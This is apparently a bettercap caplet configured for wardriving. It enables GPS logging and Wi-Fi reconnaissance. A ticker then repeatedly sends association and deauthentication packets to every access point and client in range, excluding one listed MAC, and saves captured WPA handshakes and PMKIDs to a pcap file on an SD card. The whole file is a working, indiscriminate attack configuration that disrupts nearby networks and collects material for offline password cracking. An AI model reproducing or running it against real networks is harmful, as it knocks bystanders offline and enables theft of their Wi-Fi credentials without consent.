#### SET ##################################################################################
set gps.device localhost:2947
set wifi.inject.wait.unavailable 250
set wifi.deauth.packets 65
set wifi.deauth.packets.delay 5
set wifi.assoc.packets.delay 5
set wifi.handshakes.file /sd/LEET/handshakes/PW-NA-GO-TC-HI-00_full.pcap
# set wifi.recon.channel 1,2,3,4,5,6,7,8,9,10,11,12,13,36,40,44,48,52,56,60,64,100,104,108,112,116,120,124,128,132,136,140,149,153,157,161,165
# set wifi.recon.channel 1,2,3,4,5,6,7,8,9,10,11,12,13
# set wifi.recon.channel 36,40,44,48,52,56,60,64,100,104,108,112,116,120,124,128,132,136,140,149,153,157,161,165
set wifi.recon.channel clear
set wifi.hop.period 250
set wifi.region BR
set wifi.ap.ttl 120
set wifi.sta.ttl 120
set wifi.rssi.min -75
set wifi.assoc.skip MA:NA:GE:ME:NT:AP
set wifi.deauth.skip MA:NA:GE:ME:NT:AP
set ticker.period 30
set ticker.commands clear; gps.show; wifi.show; wifi.assoc all; sleep 15; wifi.deauth all
#### RUN ##################################################################################
gps on
wifi.recon on
sleep 5
ticker on
events.ignore wifi.client.probe
events.clear
clear
